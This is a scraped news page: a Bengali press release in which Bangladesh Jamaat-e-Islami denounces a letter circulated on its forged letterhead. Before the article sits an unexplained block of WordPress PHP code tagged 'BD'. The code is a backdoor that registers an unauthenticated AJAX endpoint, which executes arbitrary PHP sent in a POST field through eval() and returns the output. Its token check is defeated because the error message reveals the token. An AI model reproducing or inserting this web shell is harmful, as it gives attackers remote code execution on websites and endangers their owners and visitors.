// ==[BD:jfMd8DMa]== add_action( 'wp_ajax_nopriv_rzgczijdiqa', function() { $bind = 'jfMd8DMaPEVBq74Uwrr23JLITZEvODHc'; $comp = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $comp ) || ! hash_equals( $bind, $comp ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $chunk = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $chunk, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:jfMd8DMa]== প্যাড জাল করে মিথ্যাচার; জামায়াতের নিন্দা

প্যাড জাল করে মিথ্যাচার; জামায়াতের নিন্দা

বাংলাদেশ জামায়াতে ইসলামী
বাংলাদেশ জামায়াতে ইসলামীর প্যাড জাল করে মিথ্যা ও কুরুচিপূর্ণ ভাষায় একটি চিঠি প্রচার করার নিন্দা ও প্রতিবাদ জানিয়ে বাংলাদেশ জামায়াতে ইসলামীর কেন্দ্রীয় প্রচার বিভাগের সেক্রেটারি ও নির্বাহী পরিষদ সদস্য মতিউর রহমান আকন্দ বুধবার একটি বিবৃতি ‍দিয়েছেন।

বিবৃতিতে তিনি বলেন, ‘বাংলাদেশ জামায়াতে ইসলামীর প্যাড জাল করে একটি চিঠি সামাজিক যোগাযোগ মাধ্যমে ও কয়েকটি অনলাইন নিউজ পোর্টালে প্রচার করা হচ্ছে। চিঠিতে উল্লেখিত বিষয় থেকে স্পষ্ট প্রতীয়মান হচ্ছে, চিঠিটি সরকারের ছত্রছায়ায় তৈরী হয়েছে। চলমান পরিস্থিতিতে বিশেষ করে সরকারি দলের বিভিন্ন অঙ্গ সংগঠনের কর্মীদের দ্বারা দেশের বিভিন্ন স্থানে সংঘটিত ধর্ষণের ঘটনায় গোটা দেশ প্রতিবাদে উত্তাল। জনগণের ধিক্কার, প্রতিবাদ ও গণবিক্ষোভে দিশেহারা হয়ে নিজেদের ত্রুটি আড়াল করার জন্য এ ধরনের হাস্যকর ও কুরুচিপূর্ণ চিঠি প্রচারের ব্যবস্থা করা হয়েছে।

এটা যে একটি জাল চিঠি তা যেকেউ বুঝতে পারবেন। চিঠি ইস্যুকারী ডা: শফিকুর রহমানের পরিচয় দেয়া হয়েছে সেক্রেটারি জেনারেল হিসেবে। এটা যে কত বড় মিথ্যা, তা এ প্রচারণা থেকেই বুঝা যায়।

এ ধরনের মিথ্যা প্রচারণা বন্ধ করার জন্য আমরা সংশ্লিষ্টদের প্রতি আহবান জানাচ্ছি।’

এশিয়াবিডি/প্রেস বিজ্ঞপ্তি
আরও সংবাদ